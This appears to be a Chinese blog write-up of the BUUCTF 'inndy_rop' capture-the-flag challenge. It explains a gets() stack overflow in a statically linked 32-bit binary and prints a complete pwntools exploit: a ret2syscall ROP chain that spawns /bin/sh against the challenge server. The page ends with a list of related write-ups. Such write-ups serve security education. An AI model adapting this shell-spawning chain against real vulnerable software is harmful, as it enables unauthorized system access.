inndy_rop

最新推荐文章于 2024-09-01 20:54:51 发布
原创 最新推荐文章于 2024-09-01 20:54:51 发布 · 700 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #网络安全 #安全

本文介绍了一道涉及栈不可执行和溢出的静态编译题目,通过使用checksec工具检查,发现存在一个gets()函数导致的溢出漏洞。由于题目是静态编译,不涉及libc调用,因此可以通过ROPgadget找到合适的rop片段来构造payload,实现getshell。最终给出了详细的payload生成代码,包括一系列的pop和mov指令,以执行系统调用获取shell。

inndy_rop

使用checksec查看:
在这里插入图片描述
开启了栈不可执行,看题目,rop。

拉进IDA中看吧:
在这里插入图片描述
堆栈不平衡,不能看伪代码,不过没事,代码简单。

调用了一个overflow函数。跟进去查看:
在这里插入图片描述
一个gets()函数,溢出简单明了。

这题是一道静态编译的题目,所以不存在libc的调用了。

可以使用ROPgadget --binary inndy_rop --ropchain找到可以一键getshell的rop片段组合。

再加上偏移,即可。

exp:

from pwn import *

#start
r = remote("node4.buuoj.cn",26188)
# r = process("../buu/inndy_rop")

#attack
from struct import pack
    
def payload():
    p = b'a'*(0xc+4)
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea060) # @ .data
    p += pack('<I', 0x080b8016) # pop eax ; ret
    p += b'/bin'
    p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea064) # @ .data + 4
    p += pack('<I', 0x080b8016) # pop eax ; ret
    p += b'//sh'
    p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea068) # @ .data + 8
    p += pack('<I', 0x080492d3) # xor eax, eax ; ret
    p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x080481c9) # pop ebx ; ret
    p += pack('<I', 0x080ea060) # @ .data
    p += pack('<I', 0x080de769) # pop ecx ; ret
    p += pack('<I', 0x080ea068) # @ .data + 8
    p += pack('<I', 0x0806ecda) # pop edx ; ret
    p += pack('<I', 0x080ea068) # @ .data + 8
    p += pack('<I', 0x080492d3) # xor eax, eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0807a66f) # inc eax ; ret
    p += pack('<I', 0x0806c943) # int 0x80
    r.sendline(p)

payload()

r.interactive()
ROP链-BUUCTF-inndy_rop(ret2syscall)
Welcome To Myon'Blog !
05-08 613
因为 pop dword ptr [ecx] 一次只能写入 4 个字节,所以我们分两次写入 /bin/sh。静态链接就意味着没法去打 ret2libc 了,因为 ret2libc 需要用到动态链接库里面的系统函数。后面就是常规的 ret2syscall 了,即系统调用 execve。既然有对 [ecx] 操作的,那么我们就继续找弹出 ecx 的指令。注意到左侧函数表有很多的函数,说明这个程序是静态链接的。找一个具有写权限的段,一般都是在 bss 段。找了一下,没有字符串 /bin/sh。
BUUCTF pwn——inndy_rop
CNS-Enterprise BCC-1701-J
05-16 354
BUUCTF 做题练习
[BUUCTF]PWN——inndy_rop
mcmuyanga的博客
11-26 1812
inndy_rop 附件 步骤: 例行检查,32位,开启了nx保护 本地调试运行没看出个啥,直接上ida,一开始f5会报错, 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的 这
inndy-rop
最新发布
m0_73743784的博客
09-01 538
其实就是直接全部使用 gadget 的 ROP,但是不得不说,确实是又学了一招。
buuctf pwninndy_rop)(cmcc_simplerop)([ZJCTF 2019]Login)
cainiao78777的博客
04-18 378
由于buuctf好多pwn题目都是一个类型的,所以就把不同的,学到东西的题目,记录一下。
BUUCTF-PWN-inndy_rop
Rt1Text的博客
03-05 903
可以栈溢出,没有system函数,使用系统调用利用ROPgadget的功能直接利用程序中的片段拼凑rop链。
buu|inndy_rop 1
m0_64236521的博客
06-19 230
buuctf|inndy_rop 1
hackme.inndy.tw的rop题目
10-15
hackme.inndy.tw的rop题目,如果那个网站被墙或者关闭的话可以从这里下载
[BUUCTF-pwn]——inndy_rop
Y_peak的博客
03-18 445
[BUUCTF-pwn]——inndy_rop main函数无法反汇编,不过还好,里面的overflow就是gets函数,可以栈溢出。 因为懒得自己去构造rop链了,看看里面是否可以拼凑出系统的调用 里面有就省的我们自己写了 中间还找了半天错,我真是个笨蛋,以前一直用p 忘记和和构造系统调用的变量重复了,改为a就好了 exploit from pwn import * from struct import pack a = remote('node3.buuoj.cn',27139) # Padding
buuctf-pwn-inndy_rop-wp
xuaohu123的博客
01-08 430
buuctf-pwn-innd_rop 查看文件保护 32位程序,开启了nx保护。
BUUCTF--pwn--inndy_rop【ret2syscall】
qq_73149934的博客
12-24 444
BUUCTF--pwn--inndy_rop
[BJDCTF 2nd]secret&&inndy_rop
、moddemod
07-20 642
[BJDCTF 2nd]secret exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './secret' p = process(proc_name) # p = remote('node3.buuoj.cn', 28831)
[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考
Tokameine的博客
09-07 730
总之先从题目开始看吧,是一道非常简单但却让我长见识的题...... int overflow() { char v1[12]; // [esp+Ch] [ebp-Ch] BYREF return gets(v1); } 明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell 主要是想拓展一下系统调用与一个简单的获取ROP方法 ROPgadget --binary rop --ropchain ROP chain...
roprop2的题目的wp
一个码农的笔记
10-17 4753
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了roprop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 首先先是rop这个题目,下载地址就在https://hackme.inndy.tw/scoreboard/,如果做题的网站关闭或者被墙,就可以从http://download.youkuaiyun.com/download/niexinming/100
PWN-PRACTICE-BUUCTF-13
P1umH0的博客
08-08 276
PWN-PRACTICE-BUUCTF-13[ZJCTF 2019]Logininndy_ropmrctf2020_shellcodejarvisoj_level1 [ZJCTF 2019]Login inndy_rop mrctf2020_shellcode jarvisoj_level1
ret2xx----- Pwn中常见的CTF模板命题
weixin_52321473的博客
04-07 1337
其实 这周末我原本是不想写文章的 主要是放假了 但是 我想往常一样登录了百度站长。。。。 我去!!! 我的文章被索引了!!!! 所以呢 我决定多更新点文章出来 而且最近不是有人说看不懂吗 我觉得更新一些可以让人懂的一些东西 但是今天 我还决定把Ret2讲完 本次教学节选于星梦安全团队在Bilibili上发表的视频 部分转载于https://www.anquanke.com/post/id/205858#h2-2 url为 https://www.bilibili.com/video/BV1Uv411j
picoctf_2018_rop chain
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值